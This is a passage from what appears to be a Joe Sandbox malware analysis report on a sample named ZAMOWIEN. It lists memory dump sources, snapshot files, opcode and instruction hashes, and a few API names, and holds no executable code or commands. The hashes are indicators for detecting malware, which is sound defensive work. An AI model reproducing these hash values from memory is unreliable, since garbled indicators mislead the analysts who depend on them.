                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7fc582160c75de2daa7dcdf700fb1a77f6ed44c7b600b52e7e949e34df472b4d
                                                                                  • Instruction ID: 30af2156db7d2fcadc322e8a774cddceb4848f7be680d8a530f3648733b0d942
                                                                                  • Opcode Fuzzy Hash: 7fc582160c75de2daa7dcdf700fb1a77f6ed44c7b600b52e7e949e34df472b4d
                                                                                  • Instruction Fuzzy Hash: BF4125B5A00345DFDB05CF59C890BA9BBF2BB49714F14816AE818AF384D739A941CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 205e52fbb2b617ddde225674cb6850fadefafd389c8c71603f82284c2af4002e
                                                                                  • Instruction ID: bc1f59bff2f2812dcc5b725b435ac1abe30bde61f301036c10f6b0cbe3de0d2e
                                                                                  • Opcode Fuzzy Hash: 205e52fbb2b617ddde225674cb6850fadefafd389c8c71603f82284c2af4002e
                                                                                  • Instruction Fuzzy Hash: 01318276A103289FDB21CB64CC50F9A77B9EF86720F510199E94CEB240DB369D448F52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0b4bd625cf66b1663133f6ae0e1ec2fbae0a2c9b3df54c4468cd5d130744c3eb
                                                                                  • Instruction ID: 1b8368cb5dcb886f6b1e7151b01295dc47b3cdbebac99a6b0a45a2a571f4121b
                                                                                  • Opcode Fuzzy Hash: 0b4bd625cf66b1663133f6ae0e1ec2fbae0a2c9b3df54c4468cd5d130744c3eb
                                                                                  • Instruction Fuzzy Hash: 5631C631B50345ABEB229F598DA1F6F77A8AF49B50F100028F900BF291CAE9DC01D7A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3327d46c0dd484ea115204cd0e12ae47aa96df97626927c45deba8764e1a0670
                                                                                  • Instruction ID: 520c3a3207652185234784ddc2c6681a71f55e042bfbe4c642753b4741b43f31
                                                                                  • Opcode Fuzzy Hash: 3327d46c0dd484ea115204cd0e12ae47aa96df97626927c45deba8764e1a0670
                                                                                  • Instruction Fuzzy Hash: FE31DE716006119FDB25CF29C840AAB77E6EF45760B41886EE449DF350EB70E842CBD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                  • Instruction ID: ee91bc42dcfd8ca7e5ab365521e2d3312cfa1fa74fff613a75aa1caf1b2439af
                                                                                  • Opcode Fuzzy Hash: e9a1b4e739a61d39d5391a5ebe807c26577b61d7282414683b6545c56c7ed405
                                                                                  • Instruction Fuzzy Hash: 9D31F07520D301DFE710DA288430B66BBD5AB853A1F44852AF8C48B292E67BDC81C7E3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 13bb30d3ce881beb5c3992545dec6e8b53ae873dc2af11e7b116e8a49cae5272
                                                                                  • Instruction ID: 5cc692083c1be13b4eca8d01511bb170e561a44cf38a3b0f9200dff5752ebaad
                                                                                  • Opcode Fuzzy Hash: 13bb30d3ce881beb5c3992545dec6e8b53ae873dc2af11e7b116e8a49cae5272
                                                                                  • Instruction Fuzzy Hash: B531C3B2241702DFD728CF18D9A0B26B3B9FF48348B50891DD006EBB02DB75E846CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugPrintTimes
                                                                                  • String ID:
                                                                                  • API String ID: 3446177414-0
                                                                                  • Opcode ID: a5c9cf2d2c69aba0f5d9f2f9e483cc06ee2662be838debe3484a7ddc19599360
                                                                                  • Instruction ID: 816a5e2762cd73098eff58a2ac93fe6f8e8f0c407e6323cb2a5ab2aea10d2742
                                                                                  • Opcode Fuzzy Hash: a5c9cf2d2c69aba0f5d9f2f9e483cc06ee2662be838debe3484a7ddc19599360
                                                                                  • Instruction Fuzzy Hash: 2C21F576901712AFC321CF58C964B1A77F5FF88B60F110829E555AF341DA34E900CBA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                  • Instruction ID: c8b44a39ecf192350c9c56ecf6a10de8dd870a3f7c979f04caaeacdd649d8f07
                                                                                  • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                  • Instruction Fuzzy Hash: F631FB7A600645EFD711CE55C9A0F6A73B9DB447A4F118429EC08FF242D774ED40CBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                  • Instruction ID: b1549d38f4b2889541ad9d6957310616222cccd12e3d4e261fd2995d2f0a594e
                                                                                  • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                  • Instruction Fuzzy Hash: 153181B2D00219EFE744DF69C880AADB7F2FF58325F158269E854DB341D734AA51CBA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ed6b0a407b487d721c2e2ea5e616370b910f8bfe03bc316a52e5fc967456a0f5
                                                                                  • Instruction ID: 30114f664f12060386b01c43526758159fa466c626b000be7140f631912766b6
                                                                                  • Opcode Fuzzy Hash: ed6b0a407b487d721c2e2ea5e616370b910f8bfe03bc316a52e5fc967456a0f5
                                                                                  • Instruction Fuzzy Hash: EA31AE76A00289BFDF12CE84CC55FAA7B6AEF847A4F114468F9046F210E774ED50DB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                  • Instruction ID: bf91a2f07f58c62792a64124aa0b33dab0c2de342caeef27a5239b13ef10a959
                                                                                  • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                  • Instruction Fuzzy Hash: 4C319AB16083459FD705CF18D840A5ABBEAEF89760F0105AAFC549B361DB34DC04CBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                  • Instruction ID: 1958ec6490c02a924b08518a96fe00b07cef878b0b19c92dc825831c91cd457a
                                                                                  • Opcode Fuzzy Hash: 913e4e62fe5ed1eb351d392b489c690631754249b42677e026e479e93032757f
                                                                                  • Instruction Fuzzy Hash: B3217B3A601741B6DB149BE4CD05ABBBBF5EF407D0F80841AFAB58E590E739E941CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                  • Instruction ID: 0dcf748005669341089a2ce17aeef0415f79cf79c91e98203a2205208c2760d6
                                                                                  • Opcode Fuzzy Hash: 0754c3be93d9ba11ea9134f78665c87217d52e306ea01fe2339886d40d526197
                                                                                  • Instruction Fuzzy Hash: DB21A175A10204EFD711CF9ADCA0FABBBBDEF8D690F510456F60197290D634AE01C7A0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52839cd72d8259e29ba726747272e05cf3171b48742121bc4e361b82744f46c6
                                                                                  • Instruction ID: b11915f1a3418bf5dea9aede58717c7201ffeec15c9ec853e0b2ccbac9c5a578
                                                                                  • Opcode Fuzzy Hash: 52839cd72d8259e29ba726747272e05cf3171b48742121bc4e361b82744f46c6
                                                                                  • Instruction Fuzzy Hash: 5321EFB1641701AFD721DB25C945B1A77EDAF89668F000819F941EB680EB38D905CBAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                  • Instruction ID: 474d8ab5e487fc5ef2325b1e1c2587b8ed463a6bb5fd4d4c2904278022365296
                                                                                  • Opcode Fuzzy Hash: 3a330ed7ea655d71dd4bed34469b5c9d3971825b19a448a40de0f01e8c52a13d
                                                                                  • Instruction Fuzzy Hash: 8721A176201304DFD719CFA5C860BA6BBE9FF95365F11416DE4068B2A0EBB2EC00CB95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 55fdf07c94c3b51e394ed4b6910c108715fb44d7aee3e28a33531fadcda2d1d8
                                                                                  • Instruction ID: e8a4b76672936eae2e6f8305632349c3f4149464d46e93ff0ea9d0cf7b33de61
                                                                                  • Opcode Fuzzy Hash: 55fdf07c94c3b51e394ed4b6910c108715fb44d7aee3e28a33531fadcda2d1d8
                                                                                  • Instruction Fuzzy Hash: 9D214672182A41DFC722DF68CA51B59B7B5FF18718F14456CE00A9BA60CB38E811CF59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8886bf75d9b080366e6a7ae2712ef8aa2e39ef013685d632a2a52b0f9a630d73
                                                                                  • Instruction ID: 181147fbc68442c5e672be3f97ab522eb5fe0068c1f8cfc0b2d3fe7dd3e8607b
                                                                                  • Opcode Fuzzy Hash: 8886bf75d9b080366e6a7ae2712ef8aa2e39ef013685d632a2a52b0f9a630d73
                                                                                  • Instruction Fuzzy Hash: AB11ACB2600705EFE711CF68C965B9B77E8FF453A4F014429E989CB211D739E8008BA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ade7ddfe29d7db050930d6b28c854d75b77d48c230bb3892979f744a04b9d39
                                                                                  • Instruction ID: 62eefc62059e18052a2f559717b9d65bc3f841a6a7a0658ef531391ef04b83e2
                                                                                  • Opcode Fuzzy Hash: 0ade7ddfe29d7db050930d6b28c854d75b77d48c230bb3892979f744a04b9d39
                                                                                  • Instruction Fuzzy Hash: 0A11C2B5641748DBD710CFA9C954B9AB7BCBF49650F1004B9E500AB652DA39DD02CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d5b7c15d1eb60161d367e2c3ec37d0fcaf88b7700e6c1b3a823d619aec1178d8
                                                                                  • Instruction ID: bf72ae1ef425d1227cefc297775ea20905b15681e9fd760933f0809a2fbf9b59
                                                                                  • Opcode Fuzzy Hash: d5b7c15d1eb60161d367e2c3ec37d0fcaf88b7700e6c1b3a823d619aec1178d8
                                                                                  • Instruction Fuzzy Hash: 81118B35201240EFCB15DF19C990F567BB9FF98B94F2404A6EA059F661C639ED01CAA4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                  • Instruction ID: 414d0fc2986a37900d21e000fdcc5f2b3897c036505de43514858401fe38edea
                                                                                  • Opcode Fuzzy Hash: 705f67a75b8a464c4c5c494a2874e61430884ed23c255893ce333174fde43e10
                                                                                  • Instruction Fuzzy Hash: 32012836210210DFEB088E29C8D0F9673AAAFC4620F1A55A5EE148F246EFB1DC41D751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4ff3da38cf08413570ccd2e390c2a1b6a22c06e738e69d764e3c82bced36564
                                                                                  • Instruction ID: 2669d0c3e18468ff5af7f0fbbf5238961c32979887e8b27c2b05339971ac2bad
                                                                                  • Opcode Fuzzy Hash: f4ff3da38cf08413570ccd2e390c2a1b6a22c06e738e69d764e3c82bced36564
                                                                                  • Instruction Fuzzy Hash: CD116171A01249EFCB00CFA9C945E9EBBF8EF44714F104066F900EB390D678DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                  • Instruction ID: 2d7366797ced0fc04a931a85288ac6cf4eecb4f0cd0edc45cfef1b9e7b6568bb
                                                                                  • Opcode Fuzzy Hash: 0af8a320b4d53ba6ca59b357e506e81477344c77024c577bbe1ae4a25d7dfec8
                                                                                  • Instruction Fuzzy Hash: D501F176240B01EFE722CA66C810AAB73EEFFC1660F04881DE9698F640DA74F401CF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                  • Instruction ID: 2cd9f4c752b697f82f26914d5d219387a9daa04754251805bade00703d6c7de0
                                                                                  • Opcode Fuzzy Hash: 72ac1dbcec8f50f888ab2d71166848a261f350b2c5ba154fd3f3a60f99f01f7a
                                                                                  • Instruction Fuzzy Hash: C811AD32950B02CFE321CF25C8A0B22B3E4FF54772F158869D5894B4A2C778E881CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9774c63fabbcf2aea5744b1be7ad343733d9a7ac2bb4c56c93fb0b9bace3df40
                                                                                  • Instruction ID: 168b79d2557372b66210a31e2c2e8536665f91fc9218c9f106c0051c6790d24c
                                                                                  • Opcode Fuzzy Hash: 9774c63fabbcf2aea5744b1be7ad343733d9a7ac2bb4c56c93fb0b9bace3df40
                                                                                  • Instruction Fuzzy Hash: 4F015E71A41208AFDB04DFA9D846EAEBBBCEF45714F504066F900EB380DA78DA01CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.33603350240.00000000376A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 376A0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.33603350240.00000000377CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_376a0000_ZAMOWIEN.jbxd
                                                                                  Similarity
